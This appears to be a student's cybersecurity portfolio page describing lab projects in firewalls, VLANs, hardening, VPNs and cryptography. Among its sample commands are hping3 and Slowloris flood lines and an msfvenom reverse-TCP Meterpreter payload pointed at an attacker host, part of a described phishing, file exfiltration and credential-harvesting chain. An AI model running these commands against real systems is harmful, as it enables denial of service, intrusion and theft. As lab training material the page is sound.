Home About Skills Coursework Certifications Projects Contact
GitHub LinkedIn

Portfolio / Technical Projects

Projects & Portfolio

// Hands-on implementations of cybersecurity, networking,
// and system administration across lab environments
// and real-world architectures.

17
Projects
40+
Tech Stacks
0
Critical CVEs
Scroll
Project Filters
Browse By Project Type
Showing all projects
01 / PROJECT
Security & Networking

Network Security Lab

Virtual Environment  ·  Fall 2025
Network Security Lab
[VIEW TOPOLOGY]
Overview

A comprehensive hands-on lab environment for practicing network security concepts — including firewall configuration, intrusion detection, and vulnerability assessment. Simulates multi-zone enterprise networks using industry-standard tools on a fully virtualized stack.

Achievements
Configured pfSense firewall with advanced rule sets, VPN tunneling, and intrusion prevention systems
Implemented network segmentation with DMZ, internal LAN, and isolated guest network zones
Conducted full vulnerability assessment using Nmap and OpenVAS across all network segments
Analyzed traffic anomalies with Wireshark using custom capture filters and display rules
Stack
VirtualBoxpfSense Kali LinuxWireshark NmapOpenVAS
Project Stats
Security Zones3
Virtual Machines5
Firewall Rules25+
Security TestsPASS
Vuln ScanCLEAN
// Timeline
Planning2 wks
Implementation4 wks
Testing2 wks
Total Duration8 weeks
// Resources
Request Documentation Ask for Source
02 / PROJECT
Web Security & Development

Secure Web Application

Full-Stack Development  ·  Spring 2025
Secure Web Application
[VIEW DEMO]
Overview

A security-focused full-stack web application featuring robust user authentication, comprehensive input validation, and hardened data handling. Built to implement OWASP security standards and prevent the most critical web application vulnerabilities.

Security Features
Secure password hashing via bcrypt with proper salt rounds and key stretching
Full input validation and sanitization preventing XSS and SQL injection vectors
Session management with secure cookies, JWT auth, and CSRF protection
CORS policies, HSTS, CSP headers, and API rate limiting implemented
Stack
HTML/CSSJavaScript Node.jsExpress.js MySQLbcrypt
Security Metrics
Security Headers7
Input Validations15+
OWASP TestsALL PASS
Critical CVEs0
Pen TestCLEAN
// Key Features
User Auth System
Secure API Endpoints
Data Encryption
Audit Logging
Role-Based Access Control
// Resources
Request Demo Access Ask for Source
03 / PROJECT
Cryptography & PKI

RSA Encrypted Email

OpenSSL · Windows Lab  ·  2025
RSA Encryption
[KEY EXCHANGE]
Overview

Implemented end-to-end RSA asymmetric encryption for secure email attachment transmission in a simulated enterprise environment. Enabled a sender to encrypt sensitive files with the recipient's public key so that only the recipient's private key could decrypt them — preventing exposure of credit card data in transit.

Implementation Steps
Generated a 4096-bit RSA private key on ZYWIN01 using OpenSSL, stored securely at C:\Users\Pasha\privateKey
Derived and exported RSA public key, then distributed it via internal email to the sending party
Encrypted creditCardInfo.txt on ZYWIN02 using the public key with OpenSSL rsautl, producing an encrypted output file
Emailed the encrypted attachment; decrypted on ZYWIN01 using the paired private key — original plaintext fully recovered
Stack
OpenSSLRSA-4096 WindowsPKI Asymmetric CryptoCMD
Crypto Metrics
Key Size4096-bit
AlgorithmRSA
Machines Used2
Data IntegrityVERIFIED
DecryptionSUCCESS
OpenSSL Commands
$openssl rsautl -encrypt -pubin -inkey publicKey.pem -in creditCardInfo.txt -out encrypted.txt
$openssl rsautl -decrypt -inkey privateKey -in encrypted.txt -out decrypted.txt
// Key Concepts
Asymmetric Key Generation
Public Key Distribution
File Encryption (RSA)
Secure Decryption
Data-in-Transit Protection
04 / PROJECT
Network Segmentation

VLAN & Subnetting Lab

Cisco Packet Tracer  ·  2025
VLAN Network Segmentation
[NETWORK DIAGRAM]
Overview

Designed and implemented network segmentation for a simulated school environment (ABC High School) using VLANs to isolate academic and administrative traffic. Extended the design with a four-subnet architecture derived from a /24 address space to enforce security boundaries between labs, offices, and administration.

Achievements
Configured VLAN 2 (academic) and VLAN 3 (administrative) on LabSwitch and OfficeSwitch with proper access-mode port assignments
Assigned static IPv4 addressing across all PCs with correct subnet masks and gateway configuration
Created a four-subnet table from 192.168.1.0/24, calculating network addresses, usable host ranges, and broadcast addresses for each subnet
Connected all devices across two switches via inter-VLAN routing through router r1, validating end-to-end segmentation
Stack
Cisco Packet TracerVLANs SubnettingIPv4 Inter-VLAN RoutingLayer 2
Network Stats
VLANs Configured2
Subnets Created4
PCs Configured4
Switches2
SegmentationVERIFIED
// Key Concepts
VLAN Access Port Config
Inter-VLAN Routing
Subnet Table Design
IPv4 Static Addressing
Network Isolation
Subnet Table (/24 → 4 subnets)
#192.168.1.0/26 — hosts .1–.62
#192.168.1.64/26 — hosts .65–.126
#192.168.1.128/26 — hosts .129–.190
#192.168.1.192/26 — hosts .193–.254
05 / PROJECT
Offensive Security

DoS Attack Simulation

hping3 · Slowloris · Wireshark  ·  2025
DoS Attack Analysis
[TRAFFIC ANALYSIS]
Overview

Executed and analyzed multiple categories of Denial-of-Service attacks across three OSI layers in a controlled virtual lab environment. Used hping3 to craft and send malformed TCP, ICMP, and UDP packets, and Slowloris to perform application-layer exhaustion — capturing all traffic in Wireshark for analysis.

Attack Vectors Demonstrated
TCP SYN flood (Layer 4) — exhausted server connection table by sending high-volume SYN packets without completing handshakes
Ping of Death & ICMP flood (Layer 3) — sent oversized and high-rate ICMP packets to saturate target bandwidth
UDP flood (Layer 3) — generated continuous UDP traffic to exhaust network bandwidth measured in Bps
Slowloris HTTP flood (Layer 7) — held open HTTP connections to exhaust web server thread pool without high bandwidth usage
Stack
hping3Slowloris WiresharkKali Linux Windows ServerTask Manager
Attack Coverage
OSI Layers Covered3, 4, 7
Attack Types5
Tools Used3
Traffic CapturedYES
EnvironmentISOLATED
// Attack Types
TCP SYN Flood
Ping of Death
ICMP Flood
UDP Flood
Slowloris HTTP Flood
Sample Commands
$hping3 -S --flood -V -p 80 [target]
$slowloris [target] -p 80 -s 500
06 / PROJECT
Firewall Configuration

Windows Firewall Hardening

Windows Server 2022  ·  2025
Firewall Configuration
[RULE CONFIGURATION]
Overview

Completed a series of increasingly complex Windows Defender Firewall labs — from basic rule configuration to a full security audit scenario for a simulated startup (ABC Tech). Applied the principle of least privilege by selectively allowing only necessary protocols while blocking all unnecessary inbound and outbound traffic vectors.

Achievements
Configured inbound and outbound rules blocking ICMPv4, L2TP, Telnet, SMB, and RDP while allowing HTTP, HTTPS, FTP, and SSH
Used nmap to scan for open ports before and after rule implementation to verify firewall effectiveness
Blocked SMB file sharing (EternalBlue attack surface) and modified existing rules to enforce traffic restrictions
Configured outbound rules blocking unencrypted SMTP and TFTP while allowing secure SMTP for encrypted email flow
Stack
Windows Defender FirewallNmap Windows Server 2022CMD SMBRDP
Rule Summary
Inbound Rules Created8
Outbound Rules Created3
Protocols Blocked6
Protocols Allowed4
Nmap VerificationPASS
// Protocols Hardened
ICMP — Blocked (recon prevention)
SMB — Blocked (EternalBlue surface)
RDP — Blocked (brute force vector)
Telnet — Blocked (plaintext)
HTTPS / SSH — Allowed
Nmap Verification
$nmap -sS -p 1-65535 [target]
$nmap -sV -O [target]
07 / PROJECT
Offensive Security

Malware & Credential Harvesting

Metasploit · SET · Kali Linux  ·  2025
Offensive Security
[CONTROLLED LAB ONLY]
Overview

Executed a full offensive security chain in a controlled virtual lab: from generating reverse TCP shellcode payloads with MSFvenom, to delivering them via phishing emails, to opening Meterpreter shells on compromised systems. Extended with credential harvesting by cloning a legitimate website using the Social Engineering Toolkit (SET) to capture submitted credentials.

Attack Chain Steps
Generated a Windows reverse TCP shellcode executable using MSFvenom and configured a Metasploit listener on Kali Linux
Crafted and sent a phishing email containing the malicious payload; executed on Windows Server 2022 target machine
Opened a Meterpreter shell on the compromised machine and exfiltrated confidential files remotely
Cloned a legitimate login page using SET's Credential Harvester, sent phishing link, and captured submitted usernames and passwords
Stack
MetasploitMSFvenom MeterpreterSET Kali LinuxWindows Server 2022
Attack Chain Metrics
Payload TypeReverse TCP
Shell AccessMeterpreter
Delivery VectorPhishing
Creds CapturedYES
EnvironmentISOLATED
// Techniques Covered
Payload Generation (MSFvenom)
Listener Configuration (MSF)
Email Phishing Delivery
Remote Shell (Meterpreter)
Website Cloning (SET)
MSFvenom Payload
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker] LPORT=4444 -f exe -o payload.exe
08 / PROJECT
Reconnaissance & Audit

Network Enumeration & Security Audit

arp-scan · hping3 · nmap  ·  2025
Network Enumeration
[SCAN RESULTS]
Overview

Performed comprehensive network enumeration and a full security audit for a simulated organization (ABC Tech) using industry-standard recon tools. Enumerated active devices via ARP scanning, profiled open ports and services using TCP SYN scans and service version detection, and identified operating systems across Windows and Linux targets.

Achievements
Used arp-scan to discover all active hosts on the network and retrieve their MAC and IP addresses
Performed full-port TCP SYN scans (ports 1–65535) on Windows Server 2022, Debian, and CentOS targets using hping3 and nmap
Detected service software versions with nmap -sV to profile running applications and identify potential vulnerabilities
Conducted OS fingerprinting with nmap -O across all three targets to identify legacy operating systems as part of the audit
Stack
arp-scanhping3 NmapKali Linux Windows ServerDebianCentOS
Audit Coverage
Targets Scanned3
Port Range1–65535
OS DetectionYES
Service VersioningYES
MAC AddressesCAPTURED
// Scan Techniques
ARP Host Discovery
TCP SYN Port Scan
Service Version Detection
OS Fingerprinting
Multi-OS Target Coverage
Enumeration Commands
$arp-scan --localnet
$nmap -sV -O -p 1-65535 [target]
09 / PROJECT
Secure Communications

SSH & HTTPS/TLS Configuration

OpenSSH · Apache2 · SSL/TLS  ·  2025
Secure Communications
[ENCRYPTED CHANNEL]
Overview

Configured end-to-end secure communications protocols across two separate labs — OpenSSH on Windows Server for remote administration and Apache2 HTTPS on Kali Linux for encrypted web traffic. Compared plaintext HTTP vs. encrypted HTTPS traffic using Wireshark to visually demonstrate the value of TLS encryption.

Achievements
Installed and configured OpenSSH server on Windows Server 2022; performed remote user account creation via SSH client
Securely transferred files between hosts using both scp (secure copy) and sftp (Secure File Transfer Protocol)
Configured SSH public-private key authentication, eliminating password-based login for the remote server
Set up Apache2 web server, generated and applied a self-signed SSL certificate, and captured HTTP vs. HTTPS traffic in Wireshark to compare plaintext vs. encrypted payloads
Stack
OpenSSHscp sftpApache2 SSL/TLSWiresharkWindows Server 2022
Configuration Metrics
SSH Auth MethodPKI Keys
File Transfer Methods2
SSL CertificateAPPLIED
Traffic AnalysisWIRESHARK
Password AuthDISABLED
// Protocols Configured
OpenSSH Server (sshd)
SCP File Transfer
SFTP File Transfer
Apache2 HTTPS + SSL
Public-Key Auth (ssh-keygen)
Key Commands
$ssh-keygen -t rsa -b 4096
$scp file.txt user@[host]:/dest/
10 / PROJECT
VPN & Active Directory

VPN Server & Active Directory

Windows Server 2022 · RAS · NPS  ·  2025
VPN and Active Directory
[SECURE TUNNEL]
Overview

Deployed a full enterprise VPN solution on Windows Server 2022 using the Remote Access role with Routing and Remote Access Service (RAS). Integrated Active Directory for user and group management, and Network Policy Server (NPS) to enforce access control policies — simulating a production remote access environment.

Achievements
Installed and configured the Remote Access server role on Windows Server 2022 with Routing and Remote Access enabled for VPN service
Created user accounts and security groups in Windows Active Directory to manage VPN access permissions
Configured a Network Policy Server (NPS) access policy to enforce group-based authentication for VPN connections
Configured a VPN client on a second Windows Server and established a verified end-to-end VPN tunnel between both machines
Stack
Windows Server 2022RAS Active DirectoryNPS VPNGroup Policy
Deployment Metrics
Server RoleRemote Access
AD IntegrationYES
Access PoliciesNPS
VPN TunnelESTABLISHED
Auth MethodGroup-Based
// Components Configured
Remote Access Role (RAS)
Routing & Remote Access
Active Directory Users/Groups
Network Policy Server (NPS)
VPN Client Configuration
AD User Creation
PS>New-ADUser -Name "VPNUser" -AccountPassword (Read-Host -AsSecureString) -Enabled $true
11 / PROJECT
Network Security Research

Stateless vs. Stateful Firewall

iptables · conntrack · tcpdump  ·  CST 3610 · 2025
Stateful Firewall Research
[PACKET ANALYSIS]
Overview

Independently designed and executed a three-phase research lab to demonstrate the fundamental security difference between stateless and stateful packet filtering. Crafted a spoofed ACK packet to bypass a stateless iptables rule, then mitigated the vulnerability using Linux conntrack — verifying the fix through live Wireshark and tcpdump captures. Analyzed findings against HIPAA Technical Safeguard requirements and OSI layer theory.

Achievements
Built an isolated VirtualBox internal network ("labnet") between two Kali Linux VMs and verified TCP three-way handshake with tcpdump
Configured a stateless iptables ACK rule and crafted a spoofed ACK packet that bypassed it — demonstrating the stateless firewall vulnerability live
Replaced the stateless rule with a conntrack ESTABLISHED,RELATED rule; confirmed the same spoofed ACK was silently dropped and verified ESTABLISHED session tracking via conntrack -L
Authored a six-question technical analysis covering CIA Triad implications, OSI layer theory, HIPAA §164.312 compliance gaps, and IDS/IPS recommendations
Stack
iptablesconntrack tcpdumpWireshark Kali LinuxVirtualBoxhping3
Lab Metrics
Lab Phases3
VMs Used2
ACK BypassDEMONSTRATED
conntrack FixVERIFIED
HIPAA AnalysisCOMPLETED
// Research Phases
Phase 1: TCP Handshake Baseline
Phase 2: Stateless ACK Bypass
Phase 3: Stateful conntrack Fix
HIPAA §164.312 Analysis
IDS/IPS Layer 7 Recommendation
The Fix: conntrack Rule
$sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
$conntrack -L | grep ESTABLISHED
12 / PROJECT
Endpoint Security & Compliance

Securing Endpoints Scenario

Windows Server 2022 & Debian  ·  ABC Tech Lab  ·  2025
Endpoint security hardening
[DUAL ENDPOINT HARDENING]
Overview

Secured new Windows and Debian workstations for ABC Tech by applying baseline endpoint controls across both systems. The scenario focused on reducing exposed services, enforcing stronger authentication, and aligning workstation configuration with organizational hardening directives.

Achievements
Enabled Windows Firewall on ZYWIN01, disabled Guest access, and shut down Print Spooler, SMTP, and OpenSSH services to reduce attack surface
Applied stronger Windows account controls with a 10-character minimum password, complexity enabled, lockout after 5 failed attempts, and a 60-minute lockout duration
Enabled UFW on ZYDEB01, then stopped and disabled nginx and vsftpd to prevent unnecessary network exposure
Hardened Debian password policy with PASS_MAX_DAYS 45, PASS_MIN_DAYS 10, WARN_AGE 3, minimum length 12, digit and uppercase requirements, and enforcement for root
Stack
Windows FirewallUFW Group PolicyPAM systemctlDebianWindows Server 2022
Compliance Metrics
Endpoints Secured2
Services Disabled5
Lockout Threshold5 Attempts
Linux Min Length12
Checklist StatusPASS
// Controls Applied
Windows Firewall Enabled
Guest Accounts Restricted
Unneeded Services Removed
Strong Password Policies Enforced
Account Lockout Controls Applied
Representative Commands
PS>net accounts /lockoutthreshold:5 /lockoutduration:60 /minpwlen:10
$sudo ufw enable && sudo systemctl disable nginx vsftpd
13 / PROJECT
Host Security & Disk Protection

Windows Host Security Lab

Windows Server 2022  ·  BitLocker & Defender  ·  2025
Windows host hardening
[HOST HARDENING]
Overview

Completed a Windows host-hardening lab focused on reducing local attack surface, tightening account policy, protecting stored data, and improving malware defense. The lab covered both operating system controls and protective tooling on ZYWIN01.

Achievements
Stopped and disabled Print Spooler, Remote Desktop Services, and Remote Registry to reduce unnecessary exposure on the host
Modified domain password and lockout policies with gpupdate validation, including 9-character minimum passwords and account lockout duration of 60 minutes
Disabled the default Guest account in Active Directory Users and Computers to block unauthenticated local access paths
Enabled BitLocker on the data drive, saved a recovery key, and configured Microsoft Defender custom scanning for targeted host protection
Stack
Windows Server 2022BitLocker Microsoft DefenderGroup Policy Active Directorygpupdate
Hardening Metrics
Services Disabled3
Min Password9
Lockout Threshold4
Drive EncryptionBITLOCKER
Defender ScanCUSTOM
// Security Controls
Print Spooler Disabled
Remote Desktop Services Disabled
Remote Registry Disabled
Guest Account Disabled
BitLocker Recovery Key Saved
Windows Policy Flow
PS>gpupdate
GUIBitLocker + Defender + ADUC configuration workflow completed
14 / PROJECT
Linux Security & Hardening

Debian Linux Hardening Lab

Debian Linux  ·  PAM & UFW  ·  2025
Debian Linux hardening
[LINUX BASELINE]
Overview

Hardened a Debian endpoint by removing exposed services, tightening password expiration and complexity rules, and enabling host firewall protection. The work focused on lowering attack surface while improving default account security posture.

Achievements
Identified running services with service --status-all, then stopped and disabled nginx, openbsd-inetd, and openvpn using systemctl
Updated /etc/login.defs to enforce password expiration after 90 days and deliver expiration warnings 14 days in advance
Modified /etc/pam.d/common-password to increase CrackLib minimum password length to 10 for stronger password complexity
Enabled Uncomplicated Firewall (UFW) and validated active protection on the host
Stack
Debiansystemctl PAMCrackLib /etc/login.defsUFW
Linux Hardening Metrics
Services Disabled3
PASS_MAX_DAYS90
PASS_WARN_AGE14
CrackLib minlen10
Firewall StatusACTIVE
Core Commands
$sudo systemctl disable nginx openbsd-inetd openvpn
$sudo ufw enable
// Files Updated
/etc/login.defs
/etc/pam.d/common-password
UFW Rule Set Verified
Open Services Reduced
Password Aging Hardened
15 / PROJECT
Virtualization Security

Secure Virtualization Host

CentOS  ·  SELinux & libvirt  ·  2025
Secure virtualization host
[HYPERVISOR PREP]
Overview

Prepared and secured a CentOS virtualization host by temporarily adjusting protective controls for installation, then restoring enforcement and removing unnecessary services before guest deployment. The lab emphasized secure host preparation and lifecycle-aware virtualization practices.

Achievements
Changed SELinux from enforcing to permissive to support virtualization component preparation, then re-enabled enforcing mode after setup
Disabled libvirt auditing and firewalld during setup steps required for host preparation and virtualization tooling changes
Disabled autofs, nfs, vsftpd, and httpd to remove unneeded services before hosting guest workloads
Ran virt-host-validate and documented host readiness checks for libvirt-based virtualization support
Stack
CentOSSELinux libvirtvirt-host-validate firewalldvirsh
Virtualization Metrics
Host OSCentOS
SELinux CycleP → E
Services Disabled4
Validation CheckRUN
Audit Level0
Key Commands
$echo "audit_level = 0" | sudo tee -a /etc/libvirt/libvirtd.conf
$sudo virt-host-validate | sudo tee /virt-host-validate.txt
// Security Focus
Hypervisor Prep Workflow
SELinux Mode Management
Host Service Reduction
libvirt Toolkit Validation
Lifecycle-Aware Hardening
16 / PROJECT
Cloud Security & IAM

MicroStack Cloud Security Lab

Debian Linux  ·  OpenStack / MicroStack  ·  2025
Cloud security lab
[OPENSTACK CONTROL]
Overview

Configured a MicroStack environment on Debian and worked through core cloud security administration tasks including password rotation, IAM management, security groups, instance workflow, and SSH key pair provisioning. The lab focused on shared-responsibility security controls in a cloud platform.

Achievements
Initialized the MicroStack control plane and reviewed core OpenStack services including Keystone, Nova, Neutron, Glance, and Cinder
Rotated the default admin password, updated microstack.rc, and re-sourced the environment for secure administrative access
Created cloud users JDoe and RSmith, built Administrators and Employees groups, and assigned group membership for role-based access organization
Launched Cirros and KeyInstance workflows, then created and assigned an SSH key pair to support secure instance access despite nested virtualization limits in the lab
Stack
MicroStackOpenStack KeystoneNeutron GlanceCinderSSH Keys
Cloud Admin Metrics
Core Services5
Users Created2
Groups Created2
Key Pairs1
Admin PasswordROTATED
// Platform Tasks
MicroStack Initialized
Admin Password Changed
Users & Groups Managed
Instances Provisioned
SSH Key Pair Added
Cloud Commands
$microstack init --auto --control
$source /var/snap/microstack/common/etc/microstack.rc
17 / PROJECT
Security Tooling & Frontend

PassGuard Password Strength Checker

HTML, CSS, JavaScript  ·  CST 3523  ·  2025
Password strength checker application
[PASSWORD POLICY ENGINE]
Overview

Built an interactive password strength checker called PassGuard that evaluates passwords in real time, measures entropy, validates security policy requirements, and logs check results. The tool combines a polished cyber-style interface with practical password quality enforcement logic.

Achievements
Created a live password evaluation engine that scores strength, updates a visual meter, and labels passwords from very weak to very strong
Implemented policy checks for length, uppercase, lowercase, number, special character, and weak-password blacklist rejection
Calculated password entropy dynamically using character set size and length to give users a more technical security measure
Added accepted/rejected result banners, session logging with timestamps, visibility toggle, clear-log actions, and Enter-key support for smoother UX
Stack
HTML5CSS3 JavaScriptDOM Entropy AnalysisPassword Policy
Tool Metrics
Score Range0-7
Policy Checks6
Weak Password List40+
Entropy OutputLIVE
Attempt LogSESSION
// Core Features
Real-Time Strength Meter
Entropy Calculation
Weak Password Blacklist
Accepted / Rejected Banner
Timestamped Session Log
Logic Highlights
JScalculateEntropy(password) + evaluate(password)
UIlive meter, criteria checklist, result banner, log history